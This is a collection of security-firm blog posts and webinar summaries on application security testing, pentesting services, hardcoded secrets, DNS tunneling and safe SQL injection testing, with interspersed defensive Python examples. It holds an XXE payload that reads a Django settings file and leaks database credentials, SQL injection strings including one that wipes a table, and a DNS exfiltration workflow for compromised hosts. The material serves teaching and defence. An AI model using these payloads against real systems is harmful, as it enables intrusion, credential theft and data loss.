    • Quality of results varies significantly between SAST and DAST products 
    • Security expertise required to interpret results and remove false positives 
  • Interactive application security testing (IAST)
    • Most popular IAST products are passive 
    • Quality of results driven by test automation and QA test coverage 
    • Easy to integrate into CI/CD pipelines 
    • Seamless to the development organization 
    • Low false positive rates
  • Runtime application self-protection (RASP) 
    • Challenging to deploy and manage in large organizations 
    • The level of effort to deploy is almost the same as fixing vulnerabilities  
    • Provides protection from common vulnerabilities getting exploited
  • Software composition analysis (SCA)  
    • Identify known security vulnerabilities in components being used 
    • Doesn’t identify new vulnerabilities in source code 
    • Challenging to deploy at scale at large organizations
    • Create a bill of materials (BOM) of Open Source components 

Post-Renovation 

Once you’ve determined what’s working with your application security program and which parts need a makeover, it’s important to take the following into consideration:

  • Build a centralized system of record to manage all AppSec activities 
  • Strategize an effective approach to AppSec with multiple touchpoints 
  • Integrate technology into processes as appropriate 
  • Enable automation to assign people to strategic tasks/activities  

Next-Gen AppSec Infrastructure  

Your next-generation application security infrastructure should be built around all your testing initiatives, including SAST, DAST, IAST, RASP, and SCA. Under each type of testing activity, the infrastructure covers project management, testing, ticketing, reporting, and remediation.  

In the middle of the infrastructure is a rock-solid threat and vulnerability management platform. NetSPI’s Resolve™ platform is built to be the warehouse for all of your data and can manage your entire secure SDLC (S-SDLC) from within the product.  

NetSPI Can Help Make Over Your Application Security Program 

As attack surfaces continue to expand and evolve, and threat actors become more sophisticated, your AppSec program has room for improvement. Read our in-depth whitepaper, Getting Started on Your Application Security Program, to begin your journey to mature your application security program and reduce risk.

With NetSPI’s offensive security platform, your organization can improve vulnerability management, achieve penetration testing efficiencies, leverage security automation, understand your risk, scale your security program, and manage your attack surface. Learn more – schedule a demo today.

Video: https://youtu.be/aojAelxBXDc

(Webinar title: Extreme Makeover AppSec Edition. Last modified 2023-07-12.)

* * *

Post, published 2020-04-21

The process of assessing third-party penetration testing vendors is the start of a long-term relationship that is core to your security testing program. It’s critical to find a vendor that can both conduct and operationalize these testing programs to scale across the smallest and largest of security organizations. This can only happen when a testing service provider is technology-enabled and can plug into any environment.

At RSA in February, NetSPI launched Penetration Testing as a Service (PTaaS). PTaaS is our unique delivery model that provides our Threat and Vulnerability Management (TVM) platform, Resolve™ to our customers on every engagement. PTaaS is designed to provide best-in-class TVM solutions, by default, for every test. Starting with the first engagement, all vulnerabilities are correlated, deduplicated, and delivered directly through Resolve™. As the testing grows, the entire suite of product functionality can be added so all of an organization’s internal and third-party testing programs can be viewable in Resolve™.

In this two-part blog, we will first review existing features that come standard with a penetration test through PTaaS. Then, in the second blog in May, we’ll discuss additional and upcoming functionality that exists to scale Resolve™ across even the largest organizations.

Program Management

The entry point into Resolve™ is the Program Management Dashboard, which helps orchestrate all testing activities that are ongoing and have been completed in the platform. At the top, you will see new vulnerabilities trending over time and by hovering over them, you can see the efficacy of each testing method. This helps identify what was found through manual penetration testing versus our proprietary multi-scanner orchestration and correlation tool, Scan Monster™, versus a traditional single network scanner.

On this same Program Management Dashboard screen, you can see the Services Overview, which aggregates all projects in Resolve™ into a matrix via Project Type and timeframe. For example, the top left card in this overview represents all Web Application Penetration Tests performed in Q1 2020. Additional detail such as scoping and vulnerability information can also be found on this card.

Projects

By clicking into one of these cards in the Services Overview, you will be taken to the Projects grid, where each project’s details can be viewed. Selecting a project will bring up all information related to that project at-a-glance, where you can view information including recent activity and comments, users assigned to the project, and project scope and definition. All communication for the project flows through this page. The project entities are also available here, along with important information like the findings discovered during the engagement and the assets that were included in the test. An asset typically relates to a unique IP address or URL.

Findings

The Findings tab will display all vulnerabilities discovered during the engagement. These findings can be searched, sorted, and filtered directly in this grid, as well as globally. Selecting a row will bring up a wealth of information about that finding.

The finding details present everything a developer would need to know to understand this type of vulnerability, including the overall severity, description, business impact, and remediation instructions for that issue, as well as what CVEs and OWASP categories are associated with that vulnerability.

Selecting the instances tab will bring up all the unique locations this vulnerability was discovered on this asset.

Instances

Inside an instance will be all the information needed to identify the specific vulnerability, including the affected URL and port and what parameters were used in the attack, along with step-by-step verification instructions. These instructions detail how to reproduce the vulnerability so developers can quickly understand and remediate it.

Concluding Thoughts

All these features are available at both the project and global levels. Users can filter, search, and globally prioritize all vulnerabilities and assets that exist in Resolve™. NetSPI has performed its penetration testing services in Resolve™ for over a decade and currently hosts 50+ million vulnerabilities for our clients – a number which is rapidly increasing.

Be sure to check back in late May for our part two in this series where we’ll discuss additional and new functionality that exists to scale Resolve™ across even the largest organizations.


(Post title: Penetration Testing as a Service – Scaling to 50 Million Vulnerabilities. Last modified 2021-04-14.)

* * *

Webinar, published 2020-02-29

Overview 

Your organization is always-on and your security should be too. Whether managing an annual penetration test or delivering and prioritizing millions of vulnerabilities, traditional service delivery methods fall short. Learn how Penetration Testing as a Service (PTaaS) scales and operationalizes continuous penetration testing in an ongoing, consumable fashion. 

Key highlights: 

Cybersecurity risk is increasing 

Cybersecurity risk is at an all-time high, and 96 percent of organizations that were breached did not follow basic security practices. Because of this increased risk, point-in-time testing cannot be the sole method of remaining secure. While an annual penetration test can be a baseline or starting point, additional measures are needed to keep up with continually expanding attack surfaces and sophisticated threat actors.   

The CISO dream state 

More than half (55 percent) of companies increased their security budgets in 2019. Given evolving threats, the ideal experience CISOs expect from security vendors includes the following elements:

  • Full confidence in coverage 
  • Access to live information and actionable findings 
  • Ease of doing business and communicating 
  • Accelerated remediation  
  • Personalized experience 
  • Enhanced reporting capabilities 

Traditional penetration testing 

Many cybersecurity vendors that have been in business for a long time tend to focus more on traditional, point-in-time penetration testing, meaning that once the engagement kicks off, they scan for vulnerabilities, provide a report, and that’s it until the time comes for another penetration test. 

Steps in traditional penetration testing include:

  • Presale 
  • Kickoff 
  • Execution 
  • Delivery 
  • Remediation  

Penetration Testing as a Service  

Rather than relying on point-in-time penetration testing, which doesn’t account for emerging vulnerabilities, new attack surfaces, or evolving threats, NetSPI provides Penetration Testing as a Service (PTaaS).

Through pentesting as a service, an expert penetration testing team is available for organizations as needed. This may include scoping a new engagement, parsing real-time vulnerability reports, assisting with remediation, or ensuring compliance year-round.  

Effective pentesting as a service shouldn’t simply end with sharing a PDF of results, but rather, should focus on discovering vulnerabilities, delivering results, and remediating continuously throughout the year.

Penetration Testing as a Service through Resolve™, NetSPI’s vulnerability management and orchestration platform, focuses on an ongoing approach to cybersecurity, rather than a point in time. PTaaS streamlines the pentesting process for organizations and ensures a frictionless and simplified experience through a single platform.

Learn more about NetSPI’s Penetration Testing as a Service capabilities and schedule a demo to see our platform in action.

Video: https://youtu.be/9TXt-7FMFCI

(Webinar title: Scaling Your Security Program with Penetration Testing as a Service. Last modified 2023-09-01.)

* * *

Post, published 2020-02-05

On Feb. 4, 2020, NetSPI Product Manager Jake Reynolds was featured in TechTarget’s WhatIs.com defining Pentesting as a Service.

Pentesting as a Service (PTaaS) is a cloud service that provides information technology (IT) professionals with the resources they need to conduct and act upon point-in-time and continuous penetration tests. The goal of PTaaS is to help organizations build successful vulnerability management programs that can find, prioritize and remediate security threats quickly and efficiently.

In IT security, it is common practice for businesses to hire reputable white-hat testers to come in and proactively look for attack vectors that could be exploited. Inviting an outside entity to try to breach a network, server or application may sound counter-intuitive, but it is also one of the best ways to identify and remediate difficult-to-spot security issues.

Read the full article on WhatIs.com.

(Post title: What Is.com Word of the Day: Pentesting as a Service (PTaaS). Last modified 2021-04-14.)

* * *

Post, published 2020-02-04

Study after study shows that business leaders across the country place cybersecurity in their top concerns for 2020. PwC’s 23rd annual CEO Survey shows that 53% of U.S. CEOs are “extremely concerned” about the effect cyber threats will have on growth prospects.

And the findings of the Conference Board are similar. According to the survey, cybersecurity was the top concern for CEOs in 2019. What’s more, according to the study, cybersecurity budgets are increasing, with more than 70% of responding CEOs globally planning to increase their cybersecurity budgets this year. Interestingly, cybersecurity strategy remains elusive: almost 40% of responding CEOs globally say their organizations lack a clear strategy to deal with the financial and reputational impact of a cyberattack or data breach.

Often, we see that an inadequate security test can leave a company with a false sense of security. Couple that with the fact that in 2019 the average cost of a data breach to a company was $3.9 million, and a greater business challenge emerges. The bottom line is that organizations are always-on, so their security should be too. It’s more critical than ever that organizations implement a more proactive strategy to better understand their security weaknesses and vulnerabilities.

Penetration testing, delivered in a consumable fashion, and executed monthly or quarterly, rather than annually, can help. At NetSPI we call it Penetration Testing as a Service or PTaaS. Here’s all you need to know before investing in PTaaS, to achieve a successful vulnerability testing and management program.

An Introduction to PTaaS

PTaaS is the delivery model of combined manual and automated pentesting producing real-time, actionable results, allowing security teams to remediate vulnerabilities faster, better understand their security posture, and perform more comprehensive testing throughout the year.

A successful PTaaS program delivers security testing comprised of an expert manual pentesting team enhanced by automation. It puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and have the ability to perform always-on continuous testing.

The Case for PTaaS

According to PwC, cyber threats are a drag on growth, and tolerances for breaches and trust in technology are plummeting. To combat these trends, organizations need to shore up resilience. “Step one is to use technology to get real-time views into your most critical processes and assets, and then set up for continuous resilience,” it states.

Organizations with a mature security program understand that point-in-time testing is not the best option for continuously securing their applications and networks. New code and configurations are released every day; a continuous security program delivers results to customers around the clock, enabling them to manage their vulnerabilities more easily and efficiently.

PTaaS should be viewed as an essential IT department activity for identifying exploitable security vulnerabilities present across all networks and computing devices, such as desktop operating systems, web applications, mobile apps, and more. It proactively hardens an environment by identifying security weaknesses and software vulnerabilities, and then prioritizing them by the severity of the outcome should they be exploited, weighed against the likelihood of the attack.

Choosing the Best PTaaS Partner for Your Business

When evaluating PTaaS options, security professionals would be well advised to:

  • Insist on real-time accessible reporting and not settle for reams and reams of static PDF reports that don’t allow for access to data in real-time as vulnerabilities are found.
  • Look for a platform, dashboard or technology efficiencies, that offer increased speed to remediation and direct communication with the pentesting experts. For example, NetSPI’s platform houses all vulnerability data and provides remediation guidance for real-time access and assessment.
  • Prioritize non-negotiables like employing a team of expert deep-dive manual pentesting professionals with enhanced automation, as automated pentesting and scanners will only ever find a portion of an organization’s vulnerabilities. While automation creates efficiencies, the human touch is also necessary to identify potentially high and critical severity threats that can only be discovered by manual testing.

As attack surfaces constantly grow and evolve, it’s important to recognize that point-in-time penetration testing, while important, is no longer an effective means of year-round security and that there are options available that can increase the value that you get from traditional testing. As an industry, our ultimate goal is to prevent breaches from happening – but, how can we make that happen without having an “always-on” mentality?

Learn more about NetSPI PTaaS here.

[post_title] => Keep Pace with Evolving Attack Surfaces: Penetration Testing as a Service

[16] => WP_Post Object ( [ID] => 8521 [post_date] => 2018-03-27 [post_content] =>

I found myself in the office on Saturday night, mainly because the frozen pizza selection is more expansive than mine at home, and I wanted to get a head start on my project for this week. It was a normal Static Application Security Test (SAST), which follows a mostly pre-defined process, with embellishments depending on the languages and frameworks at play.

The first step in that process is to search for hardcoded passwords. I dug out the simple and ugly password regex I’ve created for this and did a search for /pa?ssw?o?r?d?|pwd/gi across the entire codebase. This regex covers all of the standard ways I've seen "password" used as a variable name in code. Without fail I got back:

[Screenshot: results of the password regex search]

After digging through all the results and parsing out the false positives I ended up with a total of 30 hardcoded passwords. All of them were database connection strings spread across 20 total users, including multiple users with admin access to the database. Our recommendation for this is simple:

Passwords should never be hardcoded in the source code.

Why?

The reasoning is that there are multiple attack paths that result in source code or arbitrary file disclosure: error messages, public GitHub repos, arbitrary file read, "oopsies" email attachments, and shoulder surfing, to name just a few.

A typical escalation path that exploits hardcoded passwords could start with an XML External Entity (XXE) injection. An application vulnerable to XXE lets an attacker read (almost) any file on the server. Through this, an attacker fingerprints the technology in play and targets the important source code files. For example, a web application using the Python Django framework will contain a settings.py file, which will sometimes contain hardcoded passwords for the DB connection. With some luck or brute force, an attacker can find the source code directory and read the settings.py file via XXE.

HTTP Request:

POST /xxe HTTP/1.1
Host: netspi.com
Connection: close

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY settings SYSTEM "file:///django-app/settings.py" >]>
<foo>&settings;</foo>

HTTP Response:

HTTP/1.1 200 OK
Content-Length: 178
Connection: close

DATABASES = {
 'default': {
 'ENGINE': 'django.db.backends.mysql',
 'NAME': 'admin',
 'USER': 'admin',
 'PASSWORD': 'password',
 'HOST': 'prod-db.netspi.com',
 'PORT': '3306',
 }
}

An attacker can now take this information and connect directly to the database, which is public-facing because someone assumed authentication was enough. Once an attacker has this amount of access, any number of paths can be followed to further infiltrate the network. This attack extends to anything that requires a password: admin pages, config pages, mail servers, etc...

Remediation

We need various forms of secrets (passwords, API keys, etc.) on the box somehow, and the goal is to find the method that minimizes the organization's risk to the greatest degree. Our suggested remediation usually comes down to supplying them through environmental variables on the server. Environmental variables are the recommended method due to the low likelihood of an attacker gaining access to them. I've only seen them exploited in two common scenarios: overly verbose debug pages left running in prod, or OS command execution used to list all of the environmental variables*. Both are easily combatable in large code repositories. Environmental variables also allow a more scalable solution, as rotating secrets will only require one configuration change.
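The two halves of the post, finding hardcoded passwords with the regex above and moving them out of the code, as one added example that is not part of the original post. The `LITERAL_ASSIGNMENT` helper pattern, the `database_settings_from_env` function and the sample settings text are constructed for this example; only the password regex comes from the post.

```python
"""Hardcoded-password check built on the post's regex, with the environment-
variable form of the Django DATABASES block as the remediated counterpart.
Added example, not code from the original post; the sample settings text
below is constructed for this example."""
import os
import re

# The post's regex for the common spellings of "password" in variable names.
PASSWORD_NAME = re.compile(r"pa?ssw?o?r?d?|pwd", re.IGNORECASE)

# Hypothetical helper pattern (an assumption of this example): an assignment
# or dict entry whose right-hand side is a quoted string literal, e.g.
#   PASSWORD = 'hunter2'      'PASSWORD': "hunter2"
LITERAL_ASSIGNMENT = re.compile(
    r"""['"]?(?P<name>[A-Za-z_][A-Za-z0-9_]*)['"]?\s*[:=]\s*(?P<value>'[^']*'|"[^"]*")"""
)

# Constructed sample mirroring the settings.py fragment disclosed via XXE above.
SAMPLE_SETTINGS = """\
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': 'admin',
        'USER': 'admin',
        'PASSWORD': 'password',
        'HOST': 'prod-db.example.com',
        'PORT': '3306',
    }
}
SMTP_PWD = "s3cret"
API_KEY = os.environ["API_KEY"]
DB_PASS = os.getenv("DB_PASS", "")
"""


def find_hardcoded_passwords(source):
    """Return (line_no, name, value) for each line where a password-like name
    is assigned a non-empty string literal.

    Lines that read the value from the process environment are treated as
    remediated; empty literals are skipped as placeholders. Everything the
    regex matches still needs a human look, as the post describes."""
    findings = []
    for line_no, line in enumerate(source.splitlines(), start=1):
        if "os.environ" in line or "os.getenv" in line:
            continue
        match = LITERAL_ASSIGNMENT.search(line)
        if not match or not PASSWORD_NAME.search(match.group("name")):
            continue
        value = match.group("value")[1:-1]  # strip the surrounding quotes
        if value:
            findings.append((line_no, match.group("name"), value))
    return findings


def database_settings_from_env(environ=None):
    """The same DATABASES block with the secret taken from the environment.

    A missing DB_PASSWORD raises KeyError on purpose: failing at startup is
    preferable to silently falling back to a default credential."""
    env = os.environ if environ is None else environ
    return {
        "default": {
            "ENGINE": "django.db.backends.mysql",
            "NAME": env.get("DB_NAME", "admin"),
            "USER": env.get("DB_USER", "admin"),
            "PASSWORD": env["DB_PASSWORD"],
            "HOST": env.get("DB_HOST", "localhost"),
            "PORT": env.get("DB_PORT", "3306"),
        }
    }


if __name__ == "__main__":
    for line_no, name, value in find_hardcoded_passwords(SAMPLE_SETTINGS):
        print(f"line {line_no}: {name} is hardcoded ({len(value)} chars)")
    settings = database_settings_from_env({"DB_PASSWORD": "from-the-environment"})
    print("PASSWORD now comes from the environment:", settings["default"]["PASSWORD"])
```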

Resources

Like most things in security, except 0days, all the information is out there. A lot of people just aren’t aware of the vulnerability or what the proper way to fix it is. Because of that I won’t rehash how every platform implements environmental variables, but I will identify what I think are the best resources for doing so.

The handling of sensitive data for an app should always be done at the deployment/orchestration level. This ensures that secrets are stored and managed away from the web servers and databases. Here are some of the popular deployment and orchestration frameworks, with their related resources:

  • Kubernetes
  • Jenkins
  • TravisCI
  • Drone
  • TeamCity
  • CircleCI
  • GitlabCI
  • AWS: this uses IAM roles, which are not discussed in this blog, but are a stronger substitute for environmental variables in AWS applications.
  • Docker Swarm: this is an interesting method using Docker Secrets. Unfortunately they are stored in files, but they are the recommended method inside of the Docker ecosystem.

In the end, secrets don't belong in the code. Proper distribution will decrease the reach an attacker has through other methods of attack and protect an organization by allowing them to rotate secrets easily and often.

Coming Up

This blog is an attempt at describing a holistic solution to secret handling that will work in every environment. Using environmental variables is still not the most secure method, as plaintext sensitive information is available to every user on the box. To combat this a platform-specific method is usually required, which Windows and Linux both offer.

We're curious to hear how other organizations handle secrets in their code and what improvements could be made to further advance the topic. Let us know @NetSPI or by leaving a comment below!

* Edit 10:13 AM: Unfortunately environmental variables on Linux are still vulnerable to arbitrary file disclosure, as seen here: https://blog.netspi.com/directory-traversal-file-inclusion-proc-file-system/.

[post_title] => Please Stop Giving Me Your Passwords

[17] => WP_Post Object ( [ID] => 8072 [post_date] => 2017-12-19 [post_content] =>

As penetration testers, the tools, information, and knowledge we have available to us directly correlate to the number of entry points we can identify and exploit in any environment. The longer we spend researching and developing individual escalation paths, the less time we have for digging into other parts of the network or application. Below we discuss some of the problems we've had with SQL injection and its related online resources and introduce our solution to fix them.

Another SQL Injection Wiki?

SQL injections are one of those vulnerabilities that, without a proper knowledge base, can take a surprising amount of time to exploit and still get meaningful results. When you have to exploit them in multiple Database Management Systems (DBMSs) every week it becomes annoying looking up all the queries and table names repeatedly. There are many resources on the internet for various injection types and DBMSs, but they only seem to give a cursory glance at the injections and fall short in describing what to do after you successfully exploit one. One of our Senior Consultants, Alexander Leary, brought up this issue and proposed an idea to Ben Tindell and me earlier this year. Ben, who loves a good wiki, and I, who was terrible at advanced SQL injection, really enjoyed the idea of a comprehensive centralized knowledge base for SQL injection. Through that exchange the NetSPI SQL Injection Wiki was born. Like other sites, aggregating the basics of injections was important. But we also wanted to aggregate what data was most valuable and where it resided within the various DBMSs, while adding injection techniques to extract that data, obfuscate queries, pivot further into the internal network, and more. Most importantly, we wanted it all in one easy-to-understand place.

Presenting

Today we are open-sourcing our wiki to address the problems listed above. You can view the wiki at https://sqlwiki.netspi.com and you can help contribute to its development on GitHub. We are striving to make this a teaching tool as much as it is a lookup tool. Beginners will benefit from starting at Step 1: Injection Detection, while experienced testers may want to skip straight to the thick of it at Step 5: Attack Queries. If you think any information is inaccurate, or think there is more information we should add, please feel free to create an issue or submit a pull request. A huge thanks to all those who have already contributed! We're excited to be releasing this and we will continue to work on making it as informative and intuitive as possible. For the time being, what other vulnerabilities do you waste the most time Googling exploits for? Let us know on Twitter @NetSPI, or by leaving a comment below!

[post_title] => NetSPI SQL Injection Wiki

[18] => WP_Post Object ( [ID] => 7976 [post_date] => 2017-09-26 [post_content] =>

DNS tunneling, in my opinion, is the niftiest data exfiltration method there is. For those not familiar, check out Section 3 from SANS's "Detecting DNS Tunneling" whitepaper here. Our Mobile Application Practice Lead, Aaron Yaeger, recently taught me how easy it is to use Burp Collaborator for DNS tunneling.
Exfiltrating data like that was a bit time consuming to do manually, so I set out to automate this task for use in all environments. I automated this task by creating an extension for Burp Suite using the built-in Burp Collaborator API, with a private Burp Collaborator server to parse incoming DNS requests and recreate the tunneled data. The two main ways to use this extension are:

Environments with Burp Suite

In this magical and unlikely environment, the tester has access to Burp Suite on both ends and this extension is installed. In that case the tester goes to the extension on their local box, starts the listening Collaborator instance, and enters the Burp Collaborator address and the data to be exfiltrated on the compromised box’s Burp instance (for full instructions see here).

Environments with Bill and Linus

However, on most compromised boxes there is no Burp Suite, but a scripting engine is usually available (PowerShell/Bash). For these environments, I have written Bash and PowerShell scripts to tunnel data to Collaborator. These scripts base32 encode the data, chunk it, and perform DNS queries carrying the chunks. The execution chain for a tester looks like this:
  1. Copy over the tunneling script to the compromised box
  2. Click “Start Listening” on the DNS Tunnel extension on the box they want to exfiltrate data to (take note of the Collaborator server address)
  3. Start the script on the compromised box, copy in the Collaborator server address and filename to exfiltrate, and click go
  4. After the data is sent click “Poll now” on the receiving machine and the data will be present
A demo starting at step 2 is below (click to enlarge):

[Animated demo: DNS tunneling extension]

This is the closest to point-and-shoot that I've seen for DNS tunneling, which makes me hope it will give pen testers access to a tool that might have been harder for them to access in the past. Another great alternative for tunneling is dnscat2, so definitely check that out to see if it fits your needs. Since I'm a big fan of blue teaming I'll reference the article I posted at the beginning, Detecting DNS Tunneling by Greg Farnham. I should point out that this extension will only work with a private Burp Collaborator server, as Burp Suite (rightly) doesn't want their domain getting flagged as malicious when this extension sends hundreds of requests.
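For the blue-team side the post points to, an added detector (not part of the post or its extension) for the traffic shape just described: base32-encoded chunks carried as the leftmost label of many queries to one collaborator domain. The resolver log lines, the `collab.example` zone, and the length/entropy thresholds are all constructed assumptions of this example.

```python
"""Detector for the DNS-tunneling shape the post describes: base32-encoded
chunks carried as the leftmost label of queries to one collaborator domain.
Added example for the blue-team side, not part of the post or its extension;
the resolver log lines are constructed and the thresholds are assumptions."""
import math
import re
from collections import defaultdict

# Constructed lines in a dnsmasq-style "query[TYPE] name from client" shape.
SAMPLE_LOG = """\
query[A] www.example.com from 10.0.0.5
query[A] ORSXG5A.collab.example from 10.0.0.5
query[A] NBSWY3DPEB3W64TMMQ.collab.example from 10.0.0.5
query[A] KRUGKIDROVUWG2ZAMJZG653OEBTG66BANJ2W24DTEBXXMZLSEB2GQZJANRQX.collab.example from 10.0.0.5
query[A] GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ.collab.example from 10.0.0.5
query[A] mail.example.com from 10.0.0.7
query[A] cdn-01.static.example.net from 10.0.0.7
"""

LOG_LINE = re.compile(r"query\[\w+\]\s+(?P<name>\S+)\s+from\s+(?P<src>\S+)")
# RFC 4648 base32 alphabet; '=' padding cannot appear in a DNS label anyway.
BASE32_LABEL = re.compile(r"^[A-Z2-7]+$", re.IGNORECASE)


def shannon_entropy(text):
    """Bits per character; encoded payloads sit well above ordinary hostnames."""
    if not text:
        return 0.0
    counts = defaultdict(int)
    for ch in text.upper():
        counts[ch] += 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_queries(log_text):
    """[(name, source_ip)] for every line that matches LOG_LINE."""
    matches = (LOG_LINE.search(line) for line in log_text.splitlines())
    return [(m.group("name"), m.group("src")) for m in matches if m]


def looks_like_tunnel_label(label, min_len=16, min_entropy=3.0):
    """True for a long, base32-only, high-entropy label (thresholds assumed)."""
    return (len(label) >= min_len
            and BASE32_LABEL.match(label) is not None
            and shannon_entropy(label) >= min_entropy)


def find_tunnel_candidates(log_text, min_hits=2):
    """Group suspicious leftmost labels by (source, parent zone) and keep the
    pairs with at least min_hits of them: one odd label is noise, a stream of
    them to the same zone from one client is the chunked-exfil pattern."""
    hits = defaultdict(list)
    for name, src in parse_queries(log_text):
        first, _, parent = name.rstrip(".").partition(".")
        if parent and looks_like_tunnel_label(first):
            hits[(src, parent)].append(first)
    return {key: labels for key, labels in hits.items() if len(labels) >= min_hits}


if __name__ == "__main__":
    for (src, zone), labels in find_tunnel_candidates(SAMPLE_LOG).items():
        print(f"{src} -> {zone}: {len(labels)} base32-looking labels, "
              f"{sum(map(len, labels))} chars of probable payload")
```

Tuning note: legitimate CDN and anti-spam services also emit long encoded labels, so the parent zone should be checked against an allow-list before alerting.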

Contributing

What is being released today is the first revision of this tool, which means everything was done the way it popped into my head. If you think there are better ways things could be implemented, please feel free to make a pull request or create an issue on GitHub. You can download the tool at https://github.com/NetSPI/BurpCollaboratorDNSTunnel.

[post_title] => DNS Tunneling with Burp Collaborator

[19] => WP_Post Object ( [ID] => 7536 [post_date] => 2017-05-16 [post_content] =>

Most penetration testers know the pain of trying to view and modify an unparsed JSON string. For those that don't, here's a taste:
{"userId":1234,"username":"JakeReynolds","favorites":["Rubik's cubes","Doctor Who"],"dislikes":["Sushi","Vegetables"]}
When looking at thousands of these strings a day it is important for them to be well formatted and easily understandable. There currently exists a Burp extension for beautifying JSON, but it is written in Python, which requires Jython to be downloaded and added to Burp. There were also some issues with Jython and that extension not being as dependable as hoped. For those reasons we ported that functionality to Java, which is run natively by Burp. Java makes this extension a one-click install, with support from Google's GSON parser. The source code can be found on our GitHub as well as PortSwigger's GitHub, which includes updated build instructions.

To install, simply go to Burp > Extender > BApp Store and select "JSON Beautifier". The next time there is a JSON request in any of the Burp tabs there will be the option of "JSON Beautifier". Any content modified in this tab will also be modified in the "Raw" tab. An example is below:

[Screenshot: JSON Beautifier walkthrough]

Thanks for checking out our Burp extension! If you would like any features added feel free to create an issue on GitHub.

[post_title] => Beautifying JSON in Burp
[post_excerpt] => Most penetration testers know the pain of trying to view and modify an unparsed JSON string. This Burp extension removes that burden and allows live editing of beautified JSON strings.

[20] => WP_Post Object ( [ID] => 6852 [post_date] => 2017-04-25 [post_content] =>

If there's anything to be learned from GitLab's recent downtime (which they handled amazingly well), it's that production databases need to be pampered. They aren't something to play around with, and as penetration testers that responsibility extends to us. Many companies will allow testing in production, and it can be argued that it is the responsible thing to do; production is where a company is most likely to get hit and it's important to test those servers. While everything said in this blog should be followed in non-prod environments, it isn't a catastrophe if non-prod data is modified. As a penetration tester it starts becoming catastrophic when one mistake in production can lead to outages and having to restore from backups, if they even exist. There has to be a way to test SQL injection without the risk of modifying production data accidentally. A Google search for "Safe SQL Injection" will return 0 relevant results. Surely others have written on this topic, and other NetSPI employees have mentioned how they go about this, but the goal of this blog is to make this subject visible and easily accessible.

Setup

Starting with setting up the databases, 3 popular Relational Database Management Systems and their associated syntaxes will be used.
RDBMS Create Table
MySQL 5.7.12
CREATE TABLE USERS (
username VARCHAR(100)  NOT NULL,
password VARCHAR(100) NOT NULL,
email VARCHAR(100)    NOT NULL
)
;
MSSQL Server 2014 Express Edition
CREATE TABLE USERS
(username varchar(100), 
password varchar(100), 
email varchar(100))
;
Oracle SQL 12c
CREATE TABLE USERS
("username" VARCHAR2(100),
"password" VARCHAR2(100),
"email" VARCHAR2(100)
)
/
Go ahead and add some users as well.
RDBMS Add Users
MySQL 5.7.12
INSERT INTO USERS (username, password, email) values
('jake','reynolds','jreynoldsdev@gmail.com'),
('net','spi','alex@netspi.com'),
('johnjacob','jingle','heimer@schmidt.com');
MSSQL Server 2014 Express Edition
INSERT INTO USERS
(username, password, email) VALUES
('jake','reynolds','jreynoldsdev@gmail.com'),
('net','spi','alex@netspi.com'),
('johnjacob','jingle','heimer@schmidt.com');
Oracle SQL 12c
INSERT into USERS ("username", "password", "email") values 
('jake','reynolds','jreynoldsdev@gmail.com'),
('net','spi','alex@netspi.com'),
('johnjacob','jingle','heimer@schmidt.com')
/

Pen Tester's First Day at Work

Now every database has a table called USERS with the structure:

     username    password   email
  1  jake        reynolds   jreynoldsdev@gmail.com
  2  net         spi        alex@netspi.com
  3  johnjacob   jingle     heimer@schmidt.com
This is usually the first table any pen tester would test against since it is called from every login form.  A simple query is used here:
SELECT username FROM USERS WHERE username='$username' and password='$password';
There’s not much harm to this query, aside from being vulnerable to SQLi.  As a tester tossing in a ' or 1=1 --  here or there won’t hurt anybody.  How about the next time this table comes into play?  When a user wants to update their email address the query looks somewhat like:
UPDATE USERS set email='$email' where username='$username';
Now here’s a weekend ruiner if the test is in production.  Giving this input form the simple test of '; --  can ruin the entire Users table.
UPDATE USERS set email=''; -- where username = '$username';
     username    password   email
  1  jake        reynolds
  2  net         spi
  3  johnjacob   jingle
CRAP. Every email in the company’s database has been deleted.  Maybe they have backups, but it's not St. Patrick's Day so luck is a little short. What happens now?  Dust off that resume and hope to not make the same mistake with future employers.

How to Keep Future Jobs

There are a couple ways to avoid this mistake and they come down to taking an extra second to think about the query format before inserting injection strings.  Going back to the update query, look at it from another angle.
UPDATE USERS set email='$email' where username='$username';
This would be blind to testers, but it would be behind a request similar to:
POST /updateEmail HTTP/1.1
Host: jakereynolds.co
Connection: close
Content-Length: 165
Content-Type: application/x-www-form-urlencoded

username=jake&email=jreynoldsdev@gmail.com
It’s clear that an email parameter is going to be inserted into a query.  Our goal is to find some strings that can be inserted without ruining everyone’s weekend. The first attempt is string concatenation, breaking out of the query and appending something to our string.  This allows the rest of the query to still be valid and shows if the parameter is vulnerable.
  MSSQL        MySQL         Oracle
  '+'concat    con' 'cat'    '||'concat
These strings all result in the query looking similar to:
UPDATE USERS set email=''+'concat' where username='jake';
     username    password   email
  1  jake        reynolds   concat
  2  net         spi        alex@netspi.com
  3  johnjacob   jingle     heimer@schmidt.com
Now everyone is hunky-dory, but none of the queries are the same across the 3 RDBMS'.  What other options are available for these 3?  MySQL and Oracle allow arithmetic operators on numeric strings.  If the injection does not need to escape a quote, MSSQL can be used as well with integers.
  MSSQL      MySQL     Oracle
  1+1        1'+'1     1'+'1
  1-1        1'-'1     1'-'1
  1/1        1'/'1     1'/'1
  1*1        1'*'1     1'*'1
  '='test
Using addition from MySQL shows this is possible with strings and numbers.
UPDATE USERS set email='1'+'1' where username='jake';
     username    password   email
  1  jake        reynolds   2
  2  net         spi        alex@netspi.com
  3  johnjacob   jingle     heimer@schmidt.com
So all 3 of the RDBMS’ have some options to use, but this is operating under the assumption that it doesn't matter what database is being tested.  What option is there to safely inject a string blindly into any of these 3 databases?
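To make the difference between the "weekend ruiner" and the safe probes concrete, an added example (not the post's code) replays the post's UPDATE query against an in-memory SQLite copy of the USERS table and puts the vulnerable concatenated query next to its parameterized fix. SQLite stands in for the three databases only because it ships with Python; that it coerces the text operands of + to numbers, like MySQL and Oracle in the post, is an assumption of this example.

```python
"""Replay of the post's UPDATE query against an in-memory SQLite copy of the
USERS table: the concatenated form is wiped by the "'; --" input, the
parameterized form stores it as plain data, and the "1'+'1" probe changes one
row only. Added example, not the post's code. Assumption: SQLite coerces the
text operands of + to numbers, so it stands in for MySQL/Oracle here."""
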